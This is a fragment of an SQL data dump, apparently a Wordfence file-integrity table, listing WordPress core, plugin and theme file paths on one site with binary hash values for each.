('i�k���C��T,�','wp-content/plugins/wordfence/lib/wfIPWhitelist.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfIPWhitelist.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','2�h��2aE��0','�D�:�]踝z����w%[�j�o����X`�','',0,'?'),
('j2\\��;\ng{0E0�','wp-content/plugins/elementor-pro/modules/theme-builder/conditions/post.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/conditions/post.php',0,'0�e��;�\\�𑶥','0�e��;�\\�𑶥','����i��#���>���\'�|C���A)�d','',0,'?'),
('j�S����^p N �','wp-content/plugins/wordpress-seo/src/generators/schema-generator.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/generators/schema-generator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����۸4X_x�@g��','���C���N��DLd�EP��m���W�79','',0,'?'),
('j!\Z��/�In��BJ','wp-content/plugins/wordfence/css/iptraf.1722265817.css','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/css/iptraf.1722265817.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�e�bf.��\n�V[�xPh','J��-@ ]�-�� �cq���WQ$8�','',0,'?'),
('j&�V1���6�4����','wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/images/icons/ajaxWhite32x32.gif',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���r��9 �#��{�','ᄆ��n�ѿ�0c~N��r��Au�g~Δ���I','',0,'?'),
('j*�\Z@�����w��','wp-content/plugins/wordpress-seo/src/helpers/date-helper.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/helpers/date-helper.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','b� +{R\\Knl/N�P','�9�qm_���D�Ie�岺R6˓�h`��Ϲ�','',0,'?'),
('j;���_�=�\Z����','wp-includes/blocks/group/editor-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/group/editor-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�̩���a��w�֤','���k�??ߙ!c \ZG���gC㜒�','',0,'?'),
('j<24��&N]�,\r�','wp-content/plugins/elementor/assets/js/packages/editor-site-navigation/editor-site-navigation.strings.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/packages/editor-site-navigation/editor-site-navigation.strings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','n_~�N���!��Q9�','��~��}�#b?�g��ko���NW����','',0,'?'),
('jQ���e���;�e','wp-includes/css/wp-pointer-rtl.min.css','/var/www/html/ictbank/blog/wp-includes/css/wp-pointer-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�>\r��@�o��4��R','Hף��m|oC4�U\\;uP�6�u�0��\n��l','',0,'?'),
('jgX�x�rTs���Ƥ�','wp-includes/blocks/comments-pagination/editor-rtl.css','/var/www/html/ictbank/blog/wp-includes/blocks/comments-pagination/editor-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\n��PTV��>0]G�xK','\"GH�H�}��*���q��\\\n-����c�|','',0,'?'),
('jmE��AX�uw�>܆','wp-admin/css/colors/ectoplasm/colors-rtl.css','/var/www/html/ictbank/blog/wp-admin/css/colors/ectoplasm/colors-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��lJ%z�KS��N�ɩ','��*x6be �`?Գ����2 lh�kͤ�','',0,'?'),
('jt��Z��ܿ�,��','wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/fonts/roboto-KFOkCnqEu92Fr1Mu51xIIzQXKMny.woff',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r����a�a��i','{J�L���ͻ&��{��{��T:������B','',0,'?'),
('juR@]�ܜ�+3�~9�i','wp-content/plugins/elementor-pro/modules/theme-builder/conditions/any-child-of-term.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/theme-builder/conditions/any-child-of-term.php',0,'�_�sԶ�L��X����','�_�sԶ�L��X����','�ؗic�>\'s�W�����grZ.�qJp�?�.��','',0,'?'),
('j�䱋����%���]�','wp-includes/class-wp-xmlrpc-server.php','/var/www/html/ictbank/blog/wp-includes/class-wp-xmlrpc-server.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','$���Bĝ��~&|Q','V�CTa<�xsT��3^��m���-��4�kޠ','',0,'?'),
('j�O��:�~�~8','wp-content/plugins/elementor-pro/assets/css/widget-woocommerce-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-woocommerce-rtl.min.css',0,'��[Jw��?����','��[Jw��?����','�G�?���NA���t���:�~j�Q� lU�','',0,'?'),
('j����p�\0Z��','wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<�^�p�5�Ɀ;','Z<Oϰ�w�HS8��O�7\'��������Y9H','',0,'?'),
('j���\n$|NW/B�w�\\','wp-content/uploads/2024/04/CV-DBA.pdf','/var/www/html/ictbank/blog/wp-content/uploads/2024/04/CV-DBA.pdf',0,'�u�D�V�泮��','�u�D�V�泮��','��}e�Y.zI��ϭ�����`#�Ah��d','',0,'?'),
('j���)n�Q8ޮ�D�','wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','vuײ���u�xJ�B|','�_\\�O��ytn����Œ�Z���մ','',0,'?'),
('j����5F+���o','wp-includes/images/crystal/interactive.png','/var/www/html/ictbank/blog/wp-includes/images/crystal/interactive.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�R�m`��`�9��','$����멘<x1��Փ��IR�V-VZ\\jg.���','',0,'?'),
('j�B����\Z��q�','wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/quick-edit-handler.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','q�5�G_�ZBT���~i','��6io��,����\n���D���թ�','',0,'?'),
('j��D�����E+��','wp-content/plugins/elementor/assets/lib/hover/hover.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/hover/hover.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�X]2������L��','�����~�rS/��ү��n�|��i)z�+�y','',0,'?'),
('j�8�Զ�gRP�Oa\\L�','wp-content/plugins/elementor/modules/usage/settings-reporter.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/modules/usage/settings-reporter.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����y��Gt�<��','N����~��\Z���g�IOT+�U�Z�','',0,'?'),
('j��4-�O Մ��rL\n','wp-content/plugins/wordfence/models/block/wfRateLimit.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/models/block/wfRateLimit.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�2�9Q{�\'Db2�w','��A�15��2sN� �äU�A�-��V��x','',0,'?'),
('j�gs�66�$��8*�E�','wp-includes/class-wp-dependency.php','/var/www/html/ictbank/blog/wp-includes/class-wp-dependency.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','r:�G5�+�H݆=K�','���\0�>\'oPH�c=J�ӌQ��T}dDGN','',0,'?'),
('j��՚Pp)m�','wp-content/plugins/elementor-pro/modules/woocommerce/widgets/products.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/woocommerce/widgets/products.php',0,'��Qg��*�4S����','��Qg��*�4S����','�6TKo;��C�z��!��yQ �{ƌ\0��|O{�','',0,'?'),
('j�Q��G�4Y�ߚC$�','wp-content/plugins/elementor/assets/js/ai-layout.min.js.LICENSE.txt','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/js/ai-layout.min.js.LICENSE.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',')�DŽ�l��%�<�a\'','§2�a�h�ߚ�!_a��4{�)��1^����k','',0,'?'),
('j��Z��b}�jT;�','wp-content/plugins/elementor-pro/modules/notes/admin-page.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/admin-page.php',0,'��0�e�rL�vyT��O�','��0�e�rL�vyT��O�','�,�02�����B����ŃZ|�$\Z+=�m�','',0,'?'),
('j�w��K+]P\nc2W��','wp-content/plugins/elementor/assets/css/widget-icon-list.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/widget-icon-list.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�]\'G^�t��+�̎X','6��͞��o�琤�뢍TjO}ݔi6#���X�','',0,'?'),
('j�d�CT[^�R���','wp-includes/block-patterns/query-large-title-posts.php','/var/www/html/ictbank/blog/wp-includes/block-patterns/query-large-title-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q��$4�-�1�e�',',���Ch1z`�q������\\2ߑ���{]','',0,'?'),
('j���k+� ��Ԥ]W�','wp-content/plugins/elementor/core/schemes/color.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/schemes/color.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','@�D%:�g�P��=\n��','�ma;�>�%��\n�����eu�I��2�0��&�E','',0,'?'),
('k ��9�%P�85Rjd','wp-content/plugins/elementor/core/editor/loader/v1/js/editor-loader-v1.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/editor/loader/v1/js/editor-loader-v1.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Al�%T��xSz��','Ɩ�+Rl�N�c�R����PrtS��q{U','',0,'?'),
('kS� ��;�,��','wp-content/plugins/elementor-pro/modules/display-conditions/conditions/base/title-condition-base.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/display-conditions/conditions/base/title-condition-base.php',0,'ӻ�\'5�Aڻ�|%\'A,�','ӻ�\'5�Aڻ�|%\'A,�','-�u���X�T���������꜄@��\'��','',0,'?'),
('k���$6O��-N�x�','wp-includes/js/tinymce/plugins/charmap/plugin.min.js','/var/www/html/ictbank/blog/wp-includes/js/tinymce/plugins/charmap/plugin.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','=B�쟄��P\rL��','�x[�G��-�90b.z�G��az�>�r','',0,'?'),
('k#lYݗ;���t;\r+�','wp-content/plugins/wordpress-seo/src/conditionals/non-multisite-conditional.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/conditionals/non-multisite-conditional.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�~�\r��[�e�}\rި�','�A�]Ѣl�U�qỲ��Z�_��@�����01�','',0,'?'),
('k)�l��&C�8��','wp-content/plugins/elementor-pro/assets/js/progress-tracker.3ec316715116e9087057.bundle.js','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/js/progress-tracker.3ec316715116e9087057.bundle.js',0,'��X��5R�*e�l/���','��X��5R�*e�l/���','�?�`ޝ���c��S���<���\n=ܻ','',0,'?'),
('k*�OP?�լ��S�$','wp-content/plugins/elementor/app/admin-menu-items/theme-builder-menu-item.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/app/admin-menu-items/theme-builder-menu-item.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Λ.��=��Gr���','��R�M��Ö�h)e��M�8^��@#���E','',0,'?'),
('k6���*���H� �u١','wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�x�ڪ)tdE��;���','?ӟqc��A�\Z�Q�<Ls���u�:�I.����','',0,'?'),
('kBQoߐ���n����','wp-includes/Requests/src/Session.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Session.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�,���:]_0��+�','�6���7��x���uv�OAHc�\nd`Ut�m','',0,'?'),
('kE#����r�Uʡ{3n�','wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-1.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/floating-buttons/widgets/contact-buttons-var-1.php',0,'�u�S��F]8�H�ݟ','�u�S��F]8�H�ݟ','Z�4*�@�?3�\r-\r���q�z?�5^8�я�','',0,'?'),
('kE��n�fϋߟ�\'qb','wp-includes/blocks/video/style.min.css','/var/www/html/ictbank/blog/wp-includes/blocks/video/style.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��-��h���Z�h�','��w����\'5۸�a�E�N���k���','',0,'?'),
('kM������̙Ysp','wp-admin/credits.php','/var/www/html/ictbank/blog/wp-admin/credits.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','>�]ı�1w�s��','�K�t�pew\r��o�U���.�����&\n�Ǒ1�','',0,'?'),
('kQ����Kү�|���','wp-content/plugins/elementor/includes/controls/groups/box-shadow.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/groups/box-shadow.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�D_ {��/:�O��','q���A@O%�zq�,o�@iı!�M�dn!�3��','',0,'?'),
('kV���BE/��;�o��>','wp-content/plugins/elementor/assets/lib/hover/hover.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/lib/hover/hover.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�� z��˫��r���','WZ1引�Q7M�_�ܔN�K�AY�2�Ga��g','',0,'?'),
('k\\pq�8�Jc�\r>','wp-content/plugins/wordpress-seo/src/config/conflicting-plugins.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/config/conflicting-plugins.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','C�Y8�\"Ԩ����6�','#�(�\na /E��U��l�;W�ؓ\0T*�','',0,'?'),
('k\\�j��Yt%�lm','wp-content/plugins/elementor-pro/modules/nav-menu/widgets/nav-menu.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/nav-menu/widgets/nav-menu.php',0,'^�\ZG�A��R�o3�','^�\ZG�A��R�o3�','D1��,SNjބ`�}]�-1O�~w���P JN','',0,'?'),
('k`\n>(����I��','wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlHandler.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor_prefixed/guzzlehttp/guzzle/src/Handler/CurlHandler.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!|ZZ��@狙�','�G��&��P�ҝ�`�g�I�O�G�TU/+��\rPR','',0,'?'),
('kg�@H�]u7o5!\0N�&','wp-content/plugins/wordpress-seo/js/dist/settings.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/settings.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�c���\"l:[�5;�','��G�+�!������6�ʇ�%���-<�Hz','',0,'?'),
('km�|��Kma0�\"*�k','wp-admin/js/tags-suggest.min.js','/var/www/html/ictbank/blog/wp-admin/js/tags-suggest.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��6oW���&����9','��hQW�S�x�����%�&� �$#��8曵D�','',0,'?'),
('kqK���8P\0��d.','wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/assets/fonts/instrument-sans/OFL.txt',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','T���3�0r���hD�','���O���6��lXӸ@ϗ��檉F�K�H@','',0,'?'),
('k�Q�d���{�E��J','wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php','/var/www/html/ictbank/blog/wp-content/themes/twentytwentyfour/patterns/cta-subscribe-centered.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','M~�����6ט�',')��\r+����{~�R;�x�RD\0�~�}�ȳ�','',0,'?'),
('k�x����\'H��ڠ ','wp-content/plugins/elementor-pro/modules/notes/document-events.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/document-events.php',0,'�\\d�y��2_(*����','�\\d�y��2_(*����','�]�\n�X� ����SJ�������zJ�','',0,'?'),
('k���uυ\'؍3�','wp-content/plugins/elementor/core/files/file-types/json.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/files/file-types/json.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��M���g�?��bu�','d�ݥ��N�}���0S ���hܜ��G�','',0,'?'),
('k���ga�Fz7���','wp-includes/Requests/src/Utility/InputValidator.php','/var/www/html/ictbank/blog/wp-includes/Requests/src/Utility/InputValidator.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','U\rʮ�Y�e L�l','�a�1��Q�au/d����s��L��Zv�U��','',0,'?'),
('k��I��T�I$)Ȁ','wp-content/plugins/elementor-pro/modules/wp-cli/update.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/wp-cli/update.php',0,'���S\nJ�Z2��u�','���S\nJ�Z2��u�','ځ�gKy�y���l�p$aK\\���L��','',0,'?'),
('k�L�8F�;DT*���`�','wp-content/themes/hello-elementor/footer.php','/var/www/html/ictbank/blog/wp-content/themes/hello-elementor/footer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��LV)����D��6\n�o','��|�xmA�Y� D���I����u`��MO?T','',0,'?'),
('k��}B>�L]~bu-','wp-content/plugins/elementor-pro/modules/progress-tracker/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/progress-tracker/module.php',0,'6�3���\r2w�͉���','6�3���\r2w�͉���','1<�셷��\\�*$]}=a~ϲ�tx v� ���','',0,'?'),
('k�8�0�y ��M��','wp-content/plugins/elementor/assets/css/common-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/common-rtl.min.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���`� \0L��#vqv=','�.�q�;�<QV��drG��|/=��gGr&)�W','',0,'?'),
('k�x�r�,j��i���(','wp-content/plugins/wordpress-seo/admin/class-asset.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/class-asset.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��!�W�@y`��:','(�!�Vڨ��#k���h�s����8\rR�Q�','',0,'?'),
('k����1���M� \'','wp-content/plugins/elementor-pro/modules/lottie/module.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/lottie/module.php',0,'\'j�R%#�����O','\'j�R%#�����O','�vٹ�L��ߠ�٠Θؒ��,�\'hqh\Z�c�X','',0,'?'),
('k��B˞�b=y��','wp-includes/user.php','/var/www/html/ictbank/blog/wp-includes/user.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','A8�E�|5�a�^`�(','y� x���Ώ�o��\Z��q�e�6���F�','',0,'?'),
('k�a�J\Z���\\D.��P','wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/roles/class-register-roles.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','ɏ3��I�!�BW�ڧ','}*0�5�-�Q�̡�p�`ˣ���rP�a','',0,'?'),
('k��U/�^���� ','wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','9��0�@�����e�v','�BZ�Exܥ+�D`�����H,C Udo�L�u[','',0,'?'),
('kˎS���;8�);��','wp-content/plugins/elementor-pro/modules/notes/usage.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/notes/usage.php',0,'�*=���]�kd��\n�','�*=���]�kd��\n�','\r��o\'�o�a�/�dxOg�M`2{�CL�?�g','',0,'?'),
('k�̻;Lb1W0�GJCc','wp-content/plugins/elementor/assets/css/admin-rtl.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor/assets/css/admin-rtl.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�<����}�4q��=��','�pш�HT�e�`f��\'���sgWq~6�n�','',0,'?'),
('k�� h�ѻ<x�j','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-null-tab.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','1�|\'��0�]���','�T!K���-�+[j��je\"a���1��Lг�i','',0,'?'),
('k��:��[F��Ep�B5�','wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shAutoloader.js','/var/www/html/ictbank/blog/wp-content/plugins/syntaxhighlighter/syntaxhighlighter3/scripts/shAutoloader.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','\r���I�������}','���\r�nj�y� ��B�˿�،l`��)d�Z ','',0,'?'),
('k�\'\n+&=��n`�3�','wp-includes/js/dist/dom-ready.js','/var/www/html/ictbank/blog/wp-includes/js/dist/dom-ready.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�w=��,��BXщ/g�','��?,Ɵp(�~���I܁�1<�k�p�|�$7Uu','',0,'?'),
('k������^m�\\���','wp-includes/blocks/navigation-link/style.css','/var/www/html/ictbank/blog/wp-includes/blocks/navigation-link/style.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�n֩F�f��ͮ�3F�','����������A�~�mHG\"i��N���r','',0,'?'),
('k���&éJ� �__g�','wp-content/plugins/wordpress-seo/images/academy/seo_for_beginners.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/academy/seo_for_beginners.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','����4H~�ɛa&��','jZ<�bA�XKz���[\0h�o�����T�A','',0,'?'),
('k�V`�r/+�;Vt�N��','wp-content/plugins/elementor-pro/assets/css/widget-payments-rtl.min.css','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/assets/css/widget-payments-rtl.min.css',0,'@;g���ź#ħ2}}F','@;g���ź#ħ2}}F','�����jo�#C����>@��wq�-Kf�-`�','',0,'?'),
('k����W\\y�(��','wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Exceptions/InvalidVersionComparisonString.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/vendor/yoast/whip/src/Exceptions/InvalidVersionComparisonString.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',' 2�zA���kY��\rW','�+��J~mY�$����6��8/�g���4a�\"�','',0,'?'),
('l �.�G�h��','wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/memoizers/presentation-memoizer.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','l�4_���~=.I���','T�N���E)O��z2.�k�DC�����^9�F','',0,'?'),
('l-�@��H�7��v��:�','wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-2320.css','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/css/dist/wpseo-dismissible-2320.css',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','���.�,eɾ=�Q/','����ʞ)�-���`�<y�ǜ���\n�G��','',0,'?'),
('l/\n�Ԁ�W�ͱ-c�','wp-includes/widgets/class-wp-widget-recent-posts.php','/var/www/html/ictbank/blog/wp-includes/widgets/class-wp-widget-recent-posts.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','I%*��1��9���','u��כw��x�mI�{��c�u�l��','',0,'?'),
('l0�:D�a/L�7��a�;','wp-includes/js/dist/preferences-persistence.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/preferences-persistence.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�;n��c��v�A:�;','y+��*����g?�!H��d7��T�w��e�,ܱ','',0,'?'),
('l9��=��h�,>���&','wp-content/plugins/wordfence/lib/wfDiagnostic.php','/var/www/html/ictbank/blog/wp-content/plugins/wordfence/lib/wfDiagnostic.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�\\�y��kf��1u�&�','_~xfN�&O��K�#]b�jL��%��<)���','',0,'?'),
('l;\\F�v_�-x\\3{�','wp-content/plugins/wordpress-seo/src/routes/wincher-route.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/routes/wincher-route.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�Q���\'l�_�O�E','�8�`4Te��I���o��L�0\'�J�� ��)�z','',0,'?'),
('lD�#S��Sxr�','wp-content/plugins/wordpress-seo/js/dist/classic-editor.js','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/js/dist/classic-editor.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�s;��=8t ��KC','6��]��͛c�����v��\n���gn�֗7�','',0,'?'),
('lZ�q�#eS%s��7Y�','wp-includes/js/dist/notices.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/notices.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','JOC�L|bS� �4y�','��ZVک��\r������Q��H��=��.�M','',0,'?'),
('lo�7���:�1\0','wp-content/plugins/elementor/core/utils/promotions/filtered-promotions-manager.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/utils/promotions/filtered-promotions-manager.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�T=e�0���[�<`u','��F�m�k��o@�R��m�_�`�?i͔','',0,'?'),
('loyM\0>5yu�t�zo�F','wp-content/uploads/2021/12/banner01-1024x700.png','/var/www/html/ictbank/blog/wp-content/uploads/2021/12/banner01-1024x700.png',0,'W������8��T\\�','W������8��T\\�','�-���w��nM�&�����G�Q:�ƻ��MO�','',0,'?'),
('lt��%��L���Մp','wp-content/plugins/wordpress-seo/images/question-mark.png','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/images/question-mark.png',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�|i���)d�pOd(','I�KLl\r�Ҧߐ�� S��ʨre4>bI�]','',0,'?'),
('l�RM��۳�zt^��o','wp-includes/js/dist/preferences.min.js','/var/www/html/ictbank/blog/wp-includes/js/dist/preferences.min.js',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','��^��>����\\#','\n~�a6�4�����_�1�U�j[��̪�','',0,'?'),
('l�BH(�\0��V�\\','wp-content/plugins/elementor-pro/modules/display-conditions/conditions/time-of-the-day-condition.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/display-conditions/conditions/time-of-the-day-condition.php',0,'��v�0�A�*�)EH\"�','��v�0�A�*�)EH\"�','��E�ʡ�����v��\n��c�ߐP⿐�c','',0,'?'),
('l�ə������R\0�','wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser-xml.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/core/utils/import-export/parsers/wxr-parser-xml.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','<g�����Z���w','��v�ǐ�+5_��Cw�+xb�RSڞ�','',0,'?'),
('l�Y��Ӽ�\0tH�!�r','wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/admin/metabox/class-metabox-analysis-seo.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','0�u�?m�\0W��-6� ','��&3m��8`l*}�\"����M��O*�T-�','',0,'?'),
('l�!쿕���Uz�sn','wp-content/plugins/elementor-pro/modules/floating-buttons/classes/render/contact-buttons-var-3-render.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor-pro/modules/floating-buttons/classes/render/contact-buttons-var-3-render.php',0,'8*/H����~1�`\r�','8*/H����~1�`\r�','8-i�E�z������w����Zz�,��@fx+]','',0,'?'),
('l�[ڭj�<�}S>�8��','wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php','/var/www/html/ictbank/blog/wp-content/plugins/wordpress-seo/src/builders/indexable-hierarchy-builder.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�W\"`���V���� ','��d�t������,�79�b��9@�g5O-�b','',0,'?'),
('l�SlaP�kF,�(�F�','wp-content/plugins/elementor/includes/controls/dimensions.php','/var/www/html/ictbank/blog/wp-content/plugins/elementor/includes/controls/dimensions.php',1,'\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0','�ʇ�F��Ǣ�3���','�<P��R�2F �9t��/4o����ʋ|o��','',0,'?'),
